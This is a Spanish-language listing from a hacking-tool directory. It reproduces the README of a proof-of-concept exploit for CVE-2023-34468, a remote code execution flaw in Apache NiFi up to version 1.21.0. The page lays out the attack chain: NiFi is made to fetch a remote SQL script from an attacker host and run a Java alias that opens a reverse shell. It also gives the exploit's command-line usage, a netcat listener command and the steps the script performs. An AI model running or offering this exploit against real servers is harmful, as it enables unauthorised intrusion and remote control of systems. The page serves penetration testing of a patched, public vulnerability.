Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/0xsoulaimane/cve-2023-34468-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHub0xsoulaimane/cve-2023-34468-poc

CVE-2023-34468-POC

PoC exploit para CVE-2023-34468 — RCE mediante H2 RUNSCRIPT en Apache NiFi <= 1.21.0

Ver Repositorio
4hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

Ejecución Remota de Código mediante H2 Database RUNSCRIPT en Apache NiFi <= 1.21.0


Vulnerabilidad

Apache NiFi incluye por defecto un JAR de base de datos H2 empaquetado. El servicio controlador DBCPConnectionPool puede configurarse para usar este driver H2. H2 soporta una sentencia RUNSCRIPT que obtiene y ejecuta un archivo SQL desde una URL remota. Ese archivo SQL puede definir código Java arbitrario mediante CREATE ALIAS y ejecutarlo en el sistema operativo del servidor.

Cadena de ataque:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

Versiones Afectadas

SoftwareVersión
Apache NiFi<= 1.21.0
Corregido en1.21.1+
JavaCualquiera (empaquetado)

Requisitos

  • Python 3.x
  • Librería requests → pip install requests
  • Objetivo NiFi con acceso de escritura anónimo O credenciales válidas
  • Acceso de red desde el objetivo hacia tu máquina (para el callback de reverse shell)

Uso

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

Argumentos

ArgumentoPor defectoDescripción
--targethttp://NiFi.target.comURL base del NiFi objetivo
--lhost10.10.10.10Tu IP (tun0)
--lport4444Puerto de escucha del reverse shell
--http-port80Puerto para servir rce.sql
--cleanupFalseEliminar los artefactos creados tras la ejecución

Configuración

Terminal 1 — listener:

root@kitploit:~
nc -lvnp 4444

Terminal 2 — exploit:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

Qué Hace el PoC

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
Descargar herramienta